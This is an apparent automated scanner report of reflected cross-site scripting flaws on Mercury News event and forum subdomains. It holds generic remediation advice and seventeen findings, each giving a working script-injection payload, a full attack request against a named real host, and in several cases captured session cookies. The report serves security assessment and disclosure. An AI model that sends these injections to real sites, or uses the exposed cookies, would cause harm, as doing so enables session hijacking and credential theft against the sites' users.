Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv ...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" />
...[SNIP]...
1.2. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv ...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" />
...[SNIP]...
1.3. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/performers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv ...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" />
...[SNIP]...
1.4. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv ...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" />
...[SNIP]...
1.5. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1
Host: events.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv ...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?305e4"><script>alert(1)</script>1a2aba766b3=1" />
...[SNIP]...
1.6. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:11:57 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50878
1.7. http://forums.mercurynews.com/forum/576 [REST URL parameter 1]
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22096
1.8. http://forums.mercurynews.com/forum/576 [REST URL parameter 2]
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16253
1.9. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/576
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response (redirected)
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988
1.10. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 1]
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:23 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22156
1.11. http://forums.mercurynews.com/forum/business-technology-business-news [REST URL parameter 2]
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16333
1.12. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/business-technology-business-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:10 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20988
1.13. http://forums.mercurynews.com/forum/news [REST URL parameter 1]
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:38 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22098
1.14. http://forums.mercurynews.com/forum/news [REST URL parameter 2]
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16072
1.15. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:24 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19272
1.16. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22112
1.17. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]
Issue detail
